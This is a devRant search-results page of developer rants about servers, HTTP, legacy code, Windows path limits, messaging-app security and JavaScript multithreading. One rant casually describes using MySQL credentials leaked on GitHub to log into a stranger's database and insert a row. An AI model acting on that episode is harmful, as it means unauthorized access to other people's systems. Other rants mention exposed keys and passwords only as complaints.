Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "http server"
-
*Now that's what I call a Hacker*
MOTHER OF ALL AUTOMATIONS
This seems a long post. but you will definitely +1 the post after reading this.
xxx: OK, so, our build engineer has left for another company. The dude was literally living inside the terminal. You know, that type of a guy who loves Vim, creates diagrams in Dot and writes wiki-posts in Markdown... If something - anything - requires more than 90 seconds of his time, he writes a script to automate that.
xxx: So we're sitting here, looking through his, uhm, "legacy"
xxx: You're gonna love this
xxx: smack-my-bitch-up.sh - sends a text message "late at work" to his wife (apparently). Automatically picks reasons from an array of strings, randomly. Runs inside a cron-job. The job fires if there are active SSH-sessions on the server after 9pm with his login.
xxx: kumar-asshole.sh - scans the inbox for emails from "Kumar" (a DBA at our clients). Looks for keywords like "help", "trouble", "sorry" etc. If keywords are found - the script SSHes into the clients server and rolls back the staging database to the latest backup. Then sends a reply "no worries mate, be careful next time".
xxx: hangover.sh - another cron-job that is set to specific dates. Sends automated emails like "not feeling well/gonna work from home" etc. Adds a random "reason" from another predefined array of strings. Fires if there are no interactive sessions on the server at 8:45am.
xxx: (and the oscar goes to) fuckingcoffee.sh - this one waits exactly 17 seconds (!), then opens an SSH session to our coffee-machine (we had no frikin idea the coffee machine is on the network, runs linux and has SSHD up and running) and sends some weird gibberish to it. Looks binary. Turns out this thing starts brewing a mid-sized half-caf latte and waits another 24 (!) seconds before pouring it into a cup. The timing is exactly how long it takes to walk to the machine from the dudes desk.
xxx: holy sh*t I'm keeping those
Credit: http://bit.ly/1jcTuTT
The bash scripts weren't bogus, you can find his scripts on the this github URL:
https://github.com/narkoz/...53 -
Hey everyone,
Merry Christmas to everyone who celebrates, happy holidays to everyone, and happy almost-new-year!
Tim and I wanted to reflect on the year devRant has had, and looking back, there are a lot of awesome things that happened in 2018 that we are very thankful for. Here are just a few of the ones that we thought of (this list is not exhaustive and I'm definitley forgetting stuff, so please comment about those!):
- After nearly a year in the making, the completely overhauled devRant web version was launched (https://devrant.com/rants/1255714/...)
- @linuxxx became the first devRant user to hit 100,000++! (https://devrant.com/rants/1157415/...)
- We once again pulled off the greatest April fools joke everrrr (https://devrant.com/rants/1311206/...)
- @trogus started making awesome devComics and http://devcomics.com was launched
- We added a feature to allow rant filtering by post type (https://devrant.com/rants/1354275/...)
- We made it so avatars could have expressions! (https://devrant.com/rants/1563683/...)
- We had a booth at TechDay New York and got to meet some devRant users! (https://devrant.com/rants/1394067/...)
- We made major backend architectural improvements - including spinning up a special high-powered-CPU web server to handle avatar creation and make the creation process much faster (https://devrant.com/rants/1370938/...)
- App stability: mainly Android - we fixed crashes, did a push-notif overhaul, and tried to continue making the apps better and more stable
- A record amount of devRant meetups were held, and we couldn't be more proud about that, and we thank every person who organized one! (just a few: https://devrant.com/rants/1588218/... https://devrant.com/rants/1884724/... https://devrant.com/rants/1683365/... https://devrant.com/rants/1922950/...)
We had a busy year, and despite some things going on for us personally and some setbacks around those, we think this was a very productve year for devRant and that we are going in the right direction. We're continuing to constantly evaluate feedback from members of the community to decide where to take the app next. We're fully committed to improving the devRant community in 2019 and we have a lot of ideas about how we can do that. We're working on some things, but we're not really announcing them yet, so please sit tight for those :) In the meantime, feel free to let us know what you'd like to see improved/added the most as we always like to get updated feedback from the community.
As always, thank you everyone, and thanks for your amazing contributions to the devRant community!
Looking forward to 2019,
- David and Tim26 -
You see a web, I see:
CLIENT: TCP SYN
SERVER: TCP SYN ACK
CLIENT: HTTP Get
SERVER: HTTP Response
...
CLIENT: TCP FIN
SERVER: TCP FIN ACK
All I’m saying is that this spider has a clear understanding of Transfer Control Protocol.13 -
So I got the job. Here's a story, never let anyone stop you from accomplishing your dreams!
It all started in 2010. Windows just crashed unrecoverably for the 3rd time in two years. Back then I wasn't good with computers yet so we got our tech guy to look at it and he said: "either pay for a windows license again (we nearly spend 1K on licenses already) or try another operating system which is free: Ubuntu. If you don't like it anyways, we can always switch back to Windows!"
Oh well, fair enough, not much to lose, right! So we went with Ubuntu. Within about 2 hours I could find everything. From the software installer to OpenOffice, browsers, email things and so on. Also I already got the basics of the Linux terminal (bash in this case) like ls, cd, mkdir and a few more.
My parents found it very easy to work with as well so we decided to stick with it.
I already started to experiment with some html/css code because the thought of being able to write my own websites was awesome! Within about a week or so I figured out a simple html site.
Then I started to experiment more and more.
After about a year of trial and error (repeat about 1000+ times) I finally got my first Apache server setup on a VirtualBox running Ubuntu server. Damn, it felt awesome to see my own shit working!
From that moment on I continued to try everything I could with Linux because I found the principle that I basically could do everything I wanted (possible with software solutions) without any limitations (like with Windows/Mac) very fucking awesome. I owned the fucking system.
Then, after some years, I got my first shared hosting plan! It was awesome to see my own (with subdomain) website online, functioning very well!
I started to learn stuff like FTP, SSH and so on.
Went on with trial and error for a while and then the thought occured to me: what if I'd have a little server ONLINE which I could use myself to experiment around?
First rented VPS was there! Couldn't get enough of it and kept experimenting with server thingies, linux in general aaand so on.
Started learning about rsa key based login, firewalls (iptables), brute force prevention (fail2ban), vhosts (apache2 still), SSL (damn this was an interesting one, how the fuck do you do this yourself?!), PHP and many other things.
Then, after a while, the thought came to mind: what if I'd have a dedicated server!?!?!?!
I ordered my first fucking dedicated server. Damn, this was awesome! Already knew some stuff about defending myself from brute force bots and so on so it went pretty well.
Finally made the jump to NginX and CentOS!
Made multiple VPS's for shitloads of purposes and just to learn. Started working with reverse proxies (nginx), proxy servers, SSL for everything (because fuck basic http WITHOUT SSL), vhosts and so on.
Started with simple, one screen linux setup with ubuntu 10.04.
Running a five monitor setup now with many distro's, running about 20 servers with proxies/nginx/apache2/multiple db engines, as much security as I can integrate and this fucking passion just got me my first Linux job!
It's not just an operating system for me, it's a way of life. And with that I don't just mean the operating system, but also the idea behind it :).20 -
--- HTTP/3 is coming! And it won't use TCP! ---
A recent announcement reveals that HTTP - the protocol used by browsers to communicate with web servers - will get a major change in version 3!
Before, the HTTP protocols (version 1.0, 1.1 and 2.2) were all layered on top of TCP (Transmission Control Protocol).
TCP provides reliable, ordered, and error-checked delivery of data over an IP network.
It can handle hardware failures, timeouts, etc. and makes sure the data is received in the order it was transmitted in.
Also you can easily detect if any corruption during transmission has occurred.
All these features are necessary for a protocol such as HTTP, but TCP wasn't originally designed for HTTP!
It's a "one-size-fits-all" solution, suitable for *any* application that needs this kind of reliability.
TCP does a lot of round trips between the client and the server to make sure everybody receives their data. Especially if you're using SSL. This results in a high network latency.
So if we had a protocol which is basically designed for HTTP, it could help a lot at fixing all these problems.
This is the idea behind "QUIC", an experimental network protocol, originally created by Google, using UDP.
Now we all know how unreliable UDP is: You don't know if the data you sent was received nor does the receiver know if there is anything missing. Also, data is unordered, so if anything takes longer to send, it will most likely mix up with the other pieces of data. The only good part of UDP is its simplicity.
So why use this crappy thing for such an important protocol as HTTP?
Well, QUIC fixes all these problems UDP has, and provides the reliability of TCP but without introducing lots of round trips and a high latency! (How cool is that?)
The Internet Engineering Task Force (IETF) has been working (or is still working) on a standardized version of QUIC, although it's very different from Google's original proposal.
The IETF also wants to create a version of HTTP that uses QUIC, previously referred to as HTTP-over-QUIC. HTTP-over-QUIC isn't, however, HTTP/2 over QUIC.
It's a new, updated version of HTTP built for QUIC.
Now, the chairman of both the HTTP working group and the QUIC working group for IETF, Mark Nottingham, wanted to rename HTTP-over-QUIC to HTTP/3, and it seems like his proposal got accepted!
So version 3 of HTTP will have QUIC as an essential, integral feature, and we can expect that it no longer uses TCP as its network protocol.
We will see how it turns out in the end, but I'm sure we will have to wait a couple more years for HTTP/3, when it has been thoroughly tested and integrated.
Thank you for reading!27 -
!rant
This was over a year ago now, but my first PR at my current job was +6,249/-1,545,334 loc. Here is how that happened... When I joined the company and saw the code I was supposed to work on I kind of freaked out. The project was set up in the most ass-backward way with some sort of bootstrap boilerplate sample app thing with its own build process inside a subfolder of the main angular project. The angular app used all the CSS, fonts, icons, etc. from the boilerplate app and referenced the assets directly. If you needed to make changes to the CSS, fonts, icons, etc you would need to cd into the boilerplate app directory, make the changes, run a Gulp build that compiled things there, then cd back to the main directory and run Grunt build (thats right, both grunt and gulp) that then built the angular app and referenced the compiled assets inside the boilerplate directory. One simple CSS change would take 2 minutes to test at minimum.
I told them I needed at least a week to overhaul the app before I felt like I could do any real work. Here were the horrors I found along the way.
- All compiled (unminified) assets (both CSS and JS) were committed to git, including vendor code such as jQuery and Bootstrap.
- All bower components were committed to git (ALL their source code, documentation, etc, not just the one dist/minified JS file we referenced).
- The Grunt build was set up by someone who had no idea what they were doing. Every SINGLE file or dependency that needed to be copied to the build folder was listed one by one in a HUGE config.json file instead of using pattern matching like `assets/images/*`.
- All the example code from the boilerplate and multiple jQuery spaghetti sample apps from the boilerplate were committed to git, as well as ALL the documentation too. There was literally a `git clone` of the boilerplate repo inside a folder in the app.
- There were two separate copies of Bootstrap 3 being compiled from source. One inside the boilerplate folder and one at the angular app level. They were both included on the page, so literally every single CSS rule was overridden by the second copy of bootstrap. Oh, and because bootstrap source was included and commited and built from source, the actual bootstrap source files had been edited by developers to change styles (instead of overriding them) so there was no replacing it with an OOTB minified version.
- It is an angular app but there were multiple jQuery libraries included and relied upon and used for actual in-app functionality behavior. And, beyond that, even though angular includes many native ways to do XHR requests (using $resource or $http), there were numerous places in the app where there were `XMLHttpRequest`s intermixed with angular code.
- There was no live reloading for local development, meaning if I wanted to make one CSS change I had to stop my server, run a build, start again (about 2 minutes total). They seemed to think this was fine.
- All this monstrosity was handled by a single massive Gruntfile that was over 2000loc. When all my hacking and slashing was done, I reduced this to ~140loc.
- There were developer's (I use that term loosely) *PERSONAL AWS ACCESS KEYS* hardcoded into the source code (remember, this is a web end app, so this was in every user's browser) in order to do file uploads. Of course when I checked in AWS, those keys had full admin access to absolutely everything in AWS.
- The entire unminified AWS Javascript SDK was included on the page and not used or referenced (~1.5mb)
- There was no error handling or reporting. An API error would just result in nothing happening on the front end, so the user would usually just click and click again, re-triggering the same error. There was also no error reporting software installed (NewRelic, Rollbar, etc) so we had no idea when our users encountered errors on the front end. The previous developers would literally guide users who were experiencing issues through opening their console in dev tools and have them screenshot the error and send it to them.
- I could go on and on...
This is why you hire a real front-end engineer to build your web app instead of the cheapest contractors you can find from Ukraine.19 -
So, i tried to demonstrate my roommate how many people push their credentials to github by searching for "password remove" commits.
I decided to show him the file and noticed something interesting. A public IP, and mysql credentials.
I visit the IP and what do i see there, a directory listening with a python script, with injects the database into a webpage (???) and a log of all http requests. Lots of failed attacks aiming at the PHP CGI. Still wondering how they failed on a python server 🤔🤔🤔
Edit phpmyadmin to connect to the mysql database. Success.
Inserted a row telling him the his password is on github. Maybe i should also have told him how to actually remove it. 😅
Yes, root can login from %
This is how far i can get with my current abilities.
------------------------------
Scary how insecure this world is.4 -
So I was hired about 4 months or so in this companty, we will name it 'Derp & Co.'
The first task they want me to do was to 'clean' an android app that, for what they told me:
- Previous dev fired. said that tasks have been done but totally a lie.
- Took a fully week of 2 fellows coworkers to 'undo' the mess.
- And for the last but not least, zero documentation, like ZERO.
So, I clone the repo, install android studio, blah blah blah, get hands to the pile of code and jesus...
- The whole app was working with a gargantuan json, there was no use of POJOs at all. Objects are for normies.
- A masive copy/paste code, like 'I will need this here, crtl-c... ctrl-v, DONE!'
- Threads are free, isn't it? let's just put a thread whenever I desire to make an HTTP request and not reuse code at all.
So... with this on mind, my first task is to make proper objects:
- Coworker: 'Sorry dev, we don't have documentation for this, you must debug the code to se what the server will send to you'.
- Me: 'Real?'
Shit... ok. So I first try to figure out how the hell is made my gargantuan json. A month was entirely lost to unravel this data and implement Objects, improve their code, reuse code, etc. but at the very end:
- coworker: 'Good job dev, when the POJOs are done, we can focus on the next task, whe have to define a new DATA MODEL because the one we are using now is not good at all'.
*note: the app is on production and working with all the previous 'features' and today it still on use on some enviroments.
- Me: 'Wait... this is a joke, now you want to define new data models? This should have been done in first place!' <WTF face>
- Coworker: 'I don't think so dev, Mr. boss have this list with things to improve on the app an this is the order of do the tasks'.
Mr. boss is on vacations, two days after he came back:
- Mr boss: 'Coworker said that you have been working with POJOs, is that right?'
- Me: 'Yes'
- Mr boss: 'Why? Did not see the need of a new data model?'
- Me: 'I told that to him, but he insist on "the order" of the list.
- Mr. boss <facepalm>
This is one of the few tales i have from 'Derp & Co.'
PS: Sorry if i made a mistake on writing, english is not my first language and maybe I have done some mistakes.7 -
Can't ssh to my vps at work; hello new hobby project!
(server hosted on vps, http request -> shell -> http response)
Next up is supporting an interactive shell18 -
this.title = "gg Microsoft"
this.metadata = {
rant: true,
long: true,
super_long: true,
has_summary: true
}
// Also:
let microsoft = "dead" // please?
tl;dr: Windows' MAX_PATH is the devil, and it basically does not allow you to copy files with paths that exceed this length. No matter what. Even with official fixes and workarounds.
Long story:
So, I haven't had actual gainful employ in quite awhile. I've been earning just enough to get behind on bills and go without all but basic groceries. Because of this, our electronics have been ... in need of upgrading for quite awhile. In particular, we've needed new drives. (We've been down a server for two years now because its drive died!)
Anyway, I originally bought my external drive just for backup, but due to the above, I eventually began using it for everyday things. including Steam. over USB. Terrible, right? So, I decided to mount it as an internal drive to lower the read/write times. Finding SATA cables was difficult, the motherboard's SATA plugs are in a terrible spot, and my tiny case (and 2yo) made everything soo much worse. It was a miserable experience, but I finally got it installed.
However! It turns out the Seagate external drives use some custom drive header, or custom driver to access the drive, so Windows couldn't read the bare drive. ffs. So, I took it out again (joy) and put it back in the enclosure, and began copying the files off.
The drive I'm copying it to is smaller, so I enabled compression to allow storing a bit more of the data, and excluded a couple of directories so I could copy those elsewhere. I (barely) managed to fit everything with some pretty tight shuffling.
but. that external drive is connected via USB, remember? and for some reason, even over USB3, I was only getting ~20mb/s transfer rate, so the process took 20some hours! In the interim, I worked on some projects, watched netflix, etc., then locked my computer, and went to bed. (I also made sure to turn my monitors and keyboard light off so it wouldn't be enticing to my 2yo.) Cue dramatic music ~
Come morning, I go to check on the progress... and find that the computer is off! What the hell! I turn it on and check the logs... and found that it lost power around 9:16am. aslkjdfhaslkjashdasfjhasd. My 2yo had apparently been playing with the power strip and its enticing glowing red on/off switch. So. It didn't finish copying.
aslkjdfhaslkjashdasfjhasd x2
Anyway, finding the missing files was easy, but what about any that didn't finish? Filesizes don't match, so writing a script to check doesn't work. and using a visual utility like windirstat won't work either because of the excluded folders. Friggin' hell.
Also -- and rather the point of this rant:
It turns out that some of the files (70 in total, as I eventually found out) have paths exceeding Windows' MAX_PATH length (260 chars). So I couldn't copy those.
After some research, I learned that there's a Microsoft hotfix that patches this specific issue! for my specific version! woo! It's like. totally perfect. So, I installed that, restarted as per its wishes... tried again (via both drag and `copy`)... and Lo! It did not work.
After installing the hotfix. to fix this specific issue. on my specific os. the issue remained. gg Microsoft?
Further research.
I then learned (well, learned more about) the unicode path prefix `\\?\`, which bypasses Windows kernel's path parsing, and passes the path directly to ntfslib, thereby indirectly allowing ~32k path lengths. I tried this with the native `copy` command; no luck. I tried this with `robocopy` and cygwin's `cp`; they likewise failed. I tried it with cygwin's `rsync`, but it sees `\\?\` as denoting a remote path, and therefore fails.
However, `dir \\?\C:\` works just fine?
So, apparently, Microsoft's own workaround for long pathnames doesn't work with its own utilities. unless the paths are shorter than MAX_PATH? gg Microsoft.
At this point, I was sorely tempted to write my own copy utility that calls the internal Windows APIs that support unicode paths. but as I lack a C compiler, and haven't coded in C in like 15 years, I figured I'd try a few last desperate ideas first.
For the hell of it, I tried making an archive of the offending files with winRAR. Unsurprisingly, it failed to access the files.
... and for completeness's sake -- mostly to say I tried it -- I did the same with 7zip. I took one of the offending files and made a 7z archive of it in the destination folder -- and, much to my surprise, it worked perfectly! I could even extract the file! Hell, I could even work with paths >340 characters!
So... I'm going through all of the 70 missing files and copying them. with 7zip. because it's the only bloody thing that works. ffs
Third-party utilities work better than Microsoft's official fixes. gg.
...
On a related note, I totally feel like that person from http://xkcd.com/763 right now ;;21 -
Misunderstanding is like running ftp server on port 80!
Ftp responses for http request!
In real life it happens like this3 -
So today (or a day ago or whatever), Pavel Durov attacked Signal by saying that he wouldn't be surprised if a backdoor would be discovered in Signal because it's partially funded by the US government (or, some part of the us govt).
Let's break down why this is utter bullshit.
First, he wouldn't be surprised if a backdoor would be discovered 'within 5 years from now'.
- Teeny tiny little detail: THE FUCKING APP IS OPEN SOURCE. So yeah sure, go look through the code! Good idea! You might actually learn something from it as your own crypto seems to be broken! (for the record, I never said anything about telegram not being open source as it is)
sources:
http://cryptofails.com/post/...
http://theregister.co.uk/2015/11/...
https://security.stackexchange.com/...
- The server side code is closed (of signal and telegram both). Well, if your app is open source, enrolled with one of the strongest cryptographic protocols in the world and has been audited, then even if the server gets compromised, the hackers are still nowhere.
- Metadata. Signal saves the following and ONLY the following: timestamp of registration, timestamp of the last connection with the server (both rounded to the day so not on the second), your phone number and your contact details (if you authorize it) (only phone numbers) in HASHED (BCrypt I thought?) format.
There have been multiple telegram metadata leaks and it's pretty known that it saves way more than neccesary.
So, before you start judging an app which is open, uses one of the best crypto protocols in the world while you use your own homegrown horribly insecure protocol AND actually tries its best to save the least possible, maybe try to fix your own shit!
*gets ready for heavy criticism*19 -
Worst thing you've seen another dev do? So many things. Here is one...
Lead web developer had in the root of their web application config.txt (ex. http://OurPublicSite/config.txt) that contained passwords because they felt the web.config was not secure enough. Any/all applications off of the root could access the file to retrieve their credentials (sql server logins, network share passwords, etc)
When I pointed out the security flaw, the developer accused me of 'hacking' the site.
I get called into the vice-president's office which he was 'deeply concerned' about my ethical behavior and if we needed to make any personnel adjustments (grown-up speak for "Do I need to fire you over this?")
Me:"I didn't hack anything. You can navigate directly to the text file using any browser."
Dev: "Directory browsing is denied on the root folder, so you hacked something to get there."
Me: "No, I knew the name of the file so I was able to access it just like any other file."
Dev: "That is only because you have admin permissions. Normal people wouldn't have access"
Me: "I could access it from my home computer"
Dev:"BECAUSE YOU HAVE ADMIN PERMISSIONS!"
Me: "On my personal laptop where I never had to login?"
VP: "What? You mean ...no....please tell me I heard that wrong."
Dev: "No..no...its secure....no one can access that file."
<click..click>
VP: "Hmmm...I can see the system administration password right here. This is unacceptable."
Dev: "Only because your an admin too."
VP: "I'll head home over lunch and try this out on my laptop...oh wait...I left it on...I can remote into it from here"
<click..click..click..click>
VP: "OMG...there it is. That account has access to everything."
<in an almost panic>
Dev: "Only because it's you...you are an admin...that's what I'm trying to say."
Me: "That is not how our public web site works."
VP: "Thank you, but Adam and I need to discuss the next course of action. You two may go."
<Adam is her boss>
Not even 5 minutes later a company wide email was sent from Adam..
"I would like to thank <Dev> for finding and fixing the security flaw that was exposed on our site. She did a great job in securing our customer data and a great asset to our team. If you see <Dev> in the hallway, be sure to give her a big thank you!"
The "fix"? She moved the text file from the root to the bin directory, where technically, the file was no longer publicly visible.
That 'pattern' was used heavily until she was promoted to upper management and the younger webdev bucks (and does) felt storing admin-level passwords was unethical and found more secure ways to authenticate.5 -
So apparently two "senior" "laravel-engineers" spent a total billed 35 hours trying to figure out a "critical bug" which "doesn't happen locally".
I went to the dev-console, saw it is generating http urls (fronted by cloudflare https, running on http server-side) and fixed that in maybe ~15 minutes, fucking morons.9 -
Boss comes in and gives me some js code for syncing data (he hacked it together the other day, really messy with like 5 callback lamdas stacked into each other)
Boss: Make it faster and more reliable and add some progress indicator
So i look at the code and he literally pulls all the data as one json (20+ MiB). Server needs multiple minutes to generate the response (lots of querys), sometimes even causing timeouts....
So i do what everyone would do and clean up the code, split the request into multiple ones, only fetching the necessary data and send the code back to my boss.
He comes in and asks me what all this complexity is about. And why i need 5 functions to do what he did in one. (He didn't -.-). He says he only told me to "make it faster and show progress" not "to split everything up".
So I ask him how he wants to do this over HTTP with just one request...
His response: "I don't care make it work!".
Sometimes i hate my job -.-11 -
Had a job interview recently that went well besides one little disagreement... and it has made me question my sanity. Tell me if I'm wrong.
They asked the difference between a GET and POST request.
Wow, that's an easy one, they're giving me a break, I thought to myself.
I said "GET is used to retrieve data from a server, whereas POST is used to add data to a server, via it's body, which a GET lacks" or something like that.
They were like "ya mostly, but GET can be used to enter data into the server too. We were just looking for the body thing."
And I'm like.... yeah, you could do that, but that's not what it's meant for.
They mention stuff about query parameters and I hold steady that GET and POST are different because GET has a specific purpose. Otherwise, we wouldn't need the "method" part of an HTTP request at all. We could just either include a body or not include a body.
I ended it with "Well, POST implies that you are adding data to a server, and GET implies you are querying data from the server. When I'm reading documentation, that's how I quickly determine what an endpoint does."
My confidence was a little shaken at this point. Crazy what two people with (I assume at least) 10+ years of experience telling you you're wrong will do to your confidence.21 -
I hate Wordpress. I hate Wordpress. I hate Wordpress.
Wordpress can take a big shit on itself and crawl into a deep dark hole far away from all that is good.
Who even uses Wordpress? Bloggers? Come on, let’s be honest, they’re using more intuitive sites like weebly, wix, and square space. So WHAT is Wordpress for? I’ll tell you, it’s just to FUCKING TORTURE PEOPLE.
So, being the “techy guy” of the family, a relative contacts me asking for some help with their website because they need to install an SSL certificate but they don’t know how to. I tell them I’d gladly do it because, sure, they’re family and how long can it possibly take to install a certificate? I’ve done it before!
Well, I get to work and log into the sluggish Wordpress dashboard and try to use a plugin that would issue a LetsEncrypt certificate because they are free and just as good as any other SSL. But one plugin after the next I keep getting errors about how my hosting wouldn’t allow it.
So I contact GoDaddy (don’t get me fucking started) and ask them about the issue. The guy tells me it’s “policy” to only be able to use GoDaddy’s certificates. How much do they cost? Oh, how about $100 a year?! Fuck you.
I figured out the only way to escape this hell was to ask them to open an economy Linux hosting account with cPanel on GoDaddy (the site was formerly hosted on a “Managed Wordpress” account which is just bullshit for not wanting to give you any control over your own goddamn content). So now I have to deal with migrating the site.
GoDaddy representative tells me that it should only take 20 minutes for me to do this (I’ve already spent way too much time on this but whatever) so I go forward with the new account. I decide I should migrate the site by exporting a backup and manually placing everything on the new server. Doesn’t it end up taking an entire hour to back up a 200MB site because GoDaddy throttled the processing speed?!
So, it’s another hour later and I’ve installed all the databases and carried over all the files. At this point, I’m really at the end of my rope and can’t wait to install the certificate and be done with this fuckery.
I install the certificate and finally get ready to be on my way, but then I see it. A warning. A warning from my browser telling me the site is only partially secure. It turns out the certificate was properly installed but whoever initially made the site HARDCODED ALL THE LINKS to images, websites, and style sheets to be http instead of https.
I’m gonna explode.
I swear, I’m gonna fucking explode.
After a total of 5 hours of work, I finally get the site secure by using search and replace on every fucking file.
Wordpress can go suck a big one. Actually, Wordpress can go suck the largest fuckin one in existence and choke on it.
TL;DR I agree to install an SSL certificate but end up with much more work than I bargained.38 -
Background: I'm not drunk yet, BUT I'M WORKING ON IT.
okay.
I just finished a second sprint on my React app. The first was to build a merchant onboarding flow. The second was to do substantial cleanup as I learned more about react/redux, and to create a "supply order" flow -- basically purchasing marketing materials and services. I finished that in a week, and I'm pretty proud. api-guy wanted it done in a day. i laughed. he probably could have, but it would have been a copy of the code in a new repo with some lines changed.
ANYWAY. it's all done and It's super pretty and works amazingly well. It has both the onboarding flow and the ordering flow, with a nice pop-out sidebar for navigation, namespaced actions, etc. Everything is pretty clean. I even added a cart to the ordering (despite everyone telling me not to) because wtf, what if someone wants to order TWO items? dumbasses. So I made that. it's sexy.
Anyway, it's all done and shiny and fancy and wonderful and I'd *love* to share screenshots if only it didn't give away where I worked. :<
... but the point of the rant!
After the first sprint, I made a copy of the repo so I could rework it and add more functionality without touching the original. (Hey! That's what a branch is for, right? Why didn't I branch it up?
well, read on)
I knew we were going to have multiple separate flows for this app: onboard, ordering, merchant tools, admin tools, support, etc. So, I wrote its server portion (the webpack builder + http server) so it would serve the same app at whatever url the user hit, and set a cookie containing that host+url. This allows the app to serve different content (basically showing/hiding content) based on the URL and future login roles. If someone hits /order, it would hide everything but the order flow. If they're a merchant, it would show all the merchant views plus ordering, etc.
tl;dr This way I can use the same codebase for multiple sites, drastically simplifying development, branding, and what have you. This new app could obv also be a drop-in replacement for the original onboarding project because of the above.
HOWEVER. this apparently isn't good enough for api-guy. He's terrified that adding/updating future components will affect all the existing content somehow.
so.
now we have three repos for basically the same codebase. 1) onboard aka "surfboard", 2) ordering, 3) merchant tools, aka "ferrari" (the "future" app).
Except.
1) "surfboard" is a very old version of the code. 3) "ferrari" is also old, since 2) "ordering" has newer content in it now.
... and somehow this is better?
fuck if i can figure out how.
His reasoning is "well, you won't be touching surfboard or ordering for 6 months, so now you don't have to worry about it." Sure, except, you know, it'll be a pain in the ass in 6 months now when I have a crapton of code and branding to redo. ffs.
Oh. We also have three Heroku pipelines for these three repos. for the same codebase.
and now you know why i'm drinking.undefined idiocy fucking hell fuck this noise api guy i'm just gonna replace everything later this codebase is as dry as the friggin ocean7 -
Yesterday the web site started logging an exception “A task was canceled” when making a http call using the .Net HTTPClient class (site calling a REST service).
Emails back n’ forth ..blaming the database…blaming the network..then a senior web developer blamed the logging (the system I’m responsible for).
Under the hood, the logger is sending the exception data to another REST service (which sends emails, generates reports etc.) which I had to quickly re-direct the discussion because if we’re seeing the exception email, the logging didn’t cause the exception, it’s just reporting it. Felt a little sad having to explain it to other IT professionals, but everyone seemed to agree and focused on the server resources.
Last night I get a call about the exceptions occurring again in much larger numbers (from 100 to over 5,000 within a few minutes). I log in, add myself to the large skype group chat going on just to catch the same senior web developer say …
“Here is the APM data that shows logging is causing the http tasks to get canceled.”
FRACK!
Me: “No, that data just shows the logging http traffic of the exception. The exception is occurring before any logging is executed. The task is either being canceled due to a network time out or IIS is running out of threads. The web site is failing to execute the http call to the REST service.”
Several other devs, DBAs, and network admins agree.
The errors only lasted a couple of minutes (exactly 2 minutes, which seemed odd), so everyone agrees to dig into the data further in the morning.
This morning I login to my computer to discover the error(s) occurred again at 6:20AM and an email from the senior web developer saying we (my mgr, her mgr, network admins, DBAs, etc) need to discuss changes to the logging system to prevent this problem from negatively affecting the customer experience...blah blah blah.
FRACKing female dog!
Good news is we never had the meeting. When the senior web dev manager came in, he cancelled the meeting.
Turned out to be a hiccup in a domain controller causing the servers to lose their connection to each other for 2 minutes (1-minute timeout, 1 minute to fully re-sync). The exact two-minute burst of errors explained (and proven via wireshark).
People and their petty office politics piss me off.2 -
I wrote this blog post entirely on my phone through doing an SSH on my home server. Why, you ask, well because I don't have my laptop and I am hella bored. Stupid, you say, well I agree.
http://iostreamer.me/chip/2016/...7 -
Front end guy: Somethings wrong with your server. My app is crashing.
* proceed to check logs. Everything fine
Me: Ok send me a log, a printscreen something. What calls do you make?
*send a printscreen with a failling 404 request
* You dense motherfucker learn your fucking http status. They are there for a reason😤3 -
Sometimes I wonder if JavaScript is the wrong tool for the job. Then I remember that someone built an HTTP server out of bash.1
-
I've been pleading for nearly 3 years with our IT department to allow the web team (me and one other guy) to access the SQL Server on location via VPN so we could query MSSQL tables directly (read-only mind you) rather than depend on them to give us a 100,000+ row CSV file every 24 hours in order to display pricing and inventory per store location on our website.
Their mindset has always been that this would be a security hole and we'd be jeopardizing the company. (Give me a break! There are about a dozen other ways our network could be compromised in comparison to this, but they're so deeply forged in M$ server and active directories that they don't even have a clue what any decent script kiddie with a port sniffer and *nix could do. I digress...)
So after three years of pleading with the old IT director, (I like the guy, but keep in mind that I had to teach him CTRL+C, CTRL+V when we first started building the initial CSV. I'm not making that up.) he retired and the new guy gave me the keys.
Worked for a week with my IT department to get Openswan (ipsec) tunnel set up between my Ubuntu web server and their SQL Server (Microsoft). After a few days of pulling my hair out along with our web hosting admins and our IT Dept staff, we got them talking.
After that, I was able to install a dreamfactory instance on my web server and now we have REST endpoints for all tables related to inventory, products, pricing, and availability!
Good things come to those who are patient. Now if I could get them to give us back Dropbox without having to socks5 proxy throug the web server, i'd be set. I'll rant about that next.
http://tapsla.sh/e0jvJck7 -
Okay, story time.
Back during 2016, I decided to do a little experiment to test the viability of multithreading in a JavaScript server stack, and I'm not talking about the Node.js way of queuing I/O on background threads, or about WebWorkers that box and convert your arguments to JSON and back during a simple call across two JS contexts.
I'm talking about JavaScript code running concurrently on all cores. I'm talking about replacing the god-awful single-threaded event loop of ECMAScript – the biggest bottleneck in software history – with an honest-to-god, lock-free thread-pool scheduler that executes JS code in parallel, on all cores.
I'm talking about concurrent access to shared mutable state – a big, rightfully-hated mess when done badly – in JavaScript.
This rant is about the many mistakes I made at the time, specifically the biggest – but not the first – of which: publishing some preliminary results very early on.
Every time I showed my work to a JavaScript developer, I'd get negative feedback. Like, unjustified hatred and immediate denial, or outright rejection of the entire concept. Some were even adamantly trying to discourage me from this project.
So I posted a sarcastic question to the Software Engineering Stack Exchange, which was originally worded differently to reflect my frustration, but was later edited by mods to be more serious.
You can see the responses for yourself here: https://goo.gl/poHKpK
Most of the serious answers were along the lines of "multithreading is hard". The top voted response started with this statement: "1) Multithreading is extremely hard, and unfortunately the way you've presented this idea so far implies you're severely underestimating how hard it is."
While I'll admit that my presentation was initially lacking, I later made an entire page to explain the synchronisation mechanism in place, and you can read more about it here, if you're interested:
http://nexusjs.com/architecture/
But what really shocked me was that I had never understood the mindset that all the naysayers adopted until I read that response.
Because the bottom-line of that entire response is an argument: an argument against change.
The average JavaScript developer doesn't want a multithreaded server platform for JavaScript because it means a change of the status quo.
And this is exactly why I started this project. I wanted a highly performant JavaScript platform for servers that's more suitable for real-time applications like transcoding, video streaming, and machine learning.
Nexus does not and will not hold your hand. It will not repeat Node's mistakes and give you nice ways to shoot yourself in the foot later, like `process.on('uncaughtException', ...)` for a catch-all global error handling solution.
No, an uncaught exception will be dealt with like any other self-respecting language: by not ignoring the problem and pretending it doesn't exist. If you write bad code, your program will crash, and you can't rectify a bug in your code by ignoring its presence entirely and using duct tape to scrape something together.
Back on the topic of multithreading, though. Multithreading is known to be hard, that's true. But how do you deal with a difficult solution? You simplify it and break it down, not just disregard it completely; because multithreading has its great advantages, too.
